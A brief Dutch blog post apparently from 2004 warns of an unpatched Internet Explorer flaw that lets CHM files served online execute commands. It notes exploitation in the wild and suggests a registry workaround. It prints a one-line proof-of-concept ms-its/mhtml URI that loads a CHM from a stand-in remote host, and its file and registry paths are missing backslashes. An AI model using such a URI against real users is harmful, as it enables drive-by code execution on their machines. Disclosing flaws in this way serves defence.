16-02-04

nieuw lek in internet explorer - no patch

Door een foute codering laat de internet explorer slechte opdrachten zichzelf uitvoeren wanneer ze online staan in de vorm van chm files.
 
het bewijs is hier
ms-its:mhtml:file://C:ss.MHT!http://www.example.com//chm.chm::/files/launch.htm

This issue is known to be exploited in the wild onder de voorlopige naam IBIZA
 
Een voorlopige oplossing zou kunnen zijn het hernoemen van de functie in de registry omdat de bestaande online kode zo niet zal kunnen werken
 
HKEY_CLASSES_ROOTPROTOCOLSHandlerms-its
 
ekz

23:38 Gepost door technology changes fast not a lot | Permalink | Commentaren (0) |  Facebook |

De commentaren zijn gesloten.